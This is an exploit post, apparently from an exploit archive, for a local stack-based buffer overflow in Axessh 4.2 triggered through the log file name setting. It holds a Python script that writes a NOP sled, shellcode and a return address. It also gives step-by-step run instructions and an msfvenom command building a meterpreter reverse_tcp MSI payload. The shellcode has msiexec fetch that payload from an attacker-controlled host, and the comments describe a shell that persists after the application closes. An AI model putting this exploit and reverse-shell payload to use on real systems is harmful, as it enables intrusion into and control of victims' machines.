Axessh 4.2 – ‘Log file name’ Local Stack-based Buffer Overflow

# Title: Axessh 4.2 - 'Log file name'  Local Stack-based Buffer Overflow
# Date: May 23rd, 2019
# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
# Vendor Homepage: http://www.labf.com
# Software Link: http://www.labf.com/download/axessh.exe
# Version v4.2
# Tested on: Windows 7 SP1 EN (x86)
# Reference: https://www.exploit-db.com/exploits/46858

# TO RUN:
# 0. Setup a multi/handler listener
# 1. Run python script
# 2. Copy contents of axssh.txt
# 3. Open telnet_S.exe
# 4. Select Details >> Settings >> Logging
# 5. Select Log all Session Output radio button
# 6. Paste the contents in Log file name
# 7. Press "OK"
# 8. Press "OK"

# EIP offset: 214
# 0x050e3f04 : push esp # ret  | ascii {PAGE_EXECUTE_READ} [ctl3d32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v2.31.000 (C:Windowssystem32ctl3d32.dll)


#77da395c - Address of LoadLibraryA() for Windows 7 SPI x86
#777db16f - Address of system() for Windows 7 SPI x86
#77da214f - Address of ExitProcess for Windows 7 SPI x86

# Shellcode Reference: https://www.exploit-db.com/shellcodes/46281
# Payload command command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.163 LPORT=4444 EXITFUNC=seh -f msi > /var/www/html/ms.msi
# When the payload runs, it floods the system with Command windows and sends back a meterpreter shell. The shell does not die even if the user closes the application.


filename = "axssh.txt"

msiScode = "x31xc0x66xb8x72x74x50x68x6dx73x76x63x54xbbx5cx39xdax77xffxd3x89xc5x31xc0x50x68x20x2fx71x6ex68x2ex6dx73x69x68x33x2fx6dx73x68x36x2ex31x36x68x38x2ex31x32x68x32x2ex31x36x68x2fx2fx31x39x68x74x74x70x3ax68x2fx69x20x68x68x78x65x63x20x68x6dx73x69x65x89xe7x57xb8x6fxb1x7dx77xffxd0x31xc0x50xb8x4fx21xdax77"

evilString = "x90" * 110 + msiScode + "x90" * 6 + "x04x3fx0ex05" + "x90"*4 + "x89xE0x83xE8x7Fx89xC4xEBx81" + "x90" * 800

file = open(filename,'w')
file.write(evilString)
file.close()
            

Comments are closed.